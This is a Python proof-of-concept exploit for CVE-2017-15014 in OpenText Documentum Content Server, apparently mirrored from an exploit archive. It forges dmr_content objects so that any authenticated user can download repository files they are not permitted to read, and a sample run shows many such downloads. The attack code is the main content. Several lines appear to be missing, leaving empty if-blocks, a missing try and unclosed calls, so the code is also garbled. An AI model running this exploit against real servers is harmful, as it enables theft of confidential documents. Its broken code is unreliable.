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Opentext Documentum Content Server File Download
来源:andrew at panfilov.tel 作者:Panfilov 发布时间:2017-10-16  
#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
# contains following design gap, which allows authenticated user to download arbitrary
# content files regardless attacker's repository permissions:
# when authenticated user upload content to repository he performs following steps:
# - calls START_PUSH RPC-command
# - uploads file to content server
# - calls END_PUSH_V2 RPC-command, here Content Server returns DATA_TICKET,
#    purposed to identify the location of the uploaded file on Content Server filesystem
# - further user creates dmr_content object in repository, which has value of data_ticket equal
#    to the value of DATA_TICKET returned at the end of END_PUSH_V2 call
# As the result of such design any authenticated user may create his own dmr_content object,
# pointing to already existing content of Content Server filesystem
# The PoC below demonstrates this vulnerability:
# MacBook-Pro:~ $ python CVE-2017-15014.py
# usage:
# CVE-2017-15014.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15014.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Trying to find any object with content...
# Querying "inaccessible" dmr_content objects...
# Downloaded 3959/3959 bytes of object 06024be980000133
# Downloaded 11280/11280 bytes of object 06024be980000135
# Downloaded 10004/10004 bytes of object 06024be980000138
# Downloaded 23692/23692 bytes of object 06024be98000017a
# Downloaded 19541/19541 bytes of object 06024be980000180
# Downloaded 1096/1096 bytes of object 06024be980000172
# Downloaded 11776/11776 bytes of object 06024be98000011f
# Downloaded 50176/50176 bytes of object 06024be980000125
# Downloaded 16384/16384 bytes of object 06024be98000012f
# Downloaded 985/985 bytes of object 06024be9800001f5
# Downloaded 191/191 bytes of object 06024be9800001fe
# Downloaded 213/213 bytes of object 06024be980000200

import socket
import sys

from dctmpy import NULL_ID

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject


def usage():
    print "usage:\n%s host port user password" % sys.argv[0]

def main():
    if len(sys.argv) != 5:

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"

    print "Trying to find any object with content..."
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \
    session.apply(None, NULL_ID, "BEGIN_TRANS")
    print "Querying \"inaccessible\" dmr_content objects..."
    for e in session.query(
            "SELECT * FROM dmr_content "
            "WHERE ANY parent_id IS NOT NULLID "
            "AND ANY parent_id NOT IN "
            "(SELECT r_object_id FROM dm_sysobject)"
        handle = 0
            content_id = session.next_id(0x06)
            obj = TypedObject(session=session)
            obj.set_string("OBJECT_TYPE", "dmr_content")
            obj.set_bool("IS_NEW_OBJECT", True)
            obj.set_int("i_vstamp", 0)
            obj.set_id("storage_id", e["storage_id"])
            obj.set_id("format", e["format"])
            obj.set_int("data_ticket", e["data_ticket"])
            obj.set_id("parent_id", object_id)
            if not session.save_cont_attrs(content_id, obj):
                print "Failed"

            handle = session.make_puller(
                NULL_ID, obj["storage_id"], content_id,
                obj["format"], obj["data_ticket"]
            if handle == 0:
                raise RuntimeError("Unable make puller")
            size = 0
            for chunk in session.download(handle):
                size += len(chunk)

            print "Downloaded %d/%d bytes of object %s" % \
                  (size, e['full_content_size'], e['r_object_id'])
            if handle > 0:

def create_session(host, port, user, pwd):
    print "Trying to connect to %s:%s as %s ..." % (host, port, user)
    session = None
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)

def is_super_user(session):
    user = session.get_by_qualification("dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False

if __name__ == '__main__':

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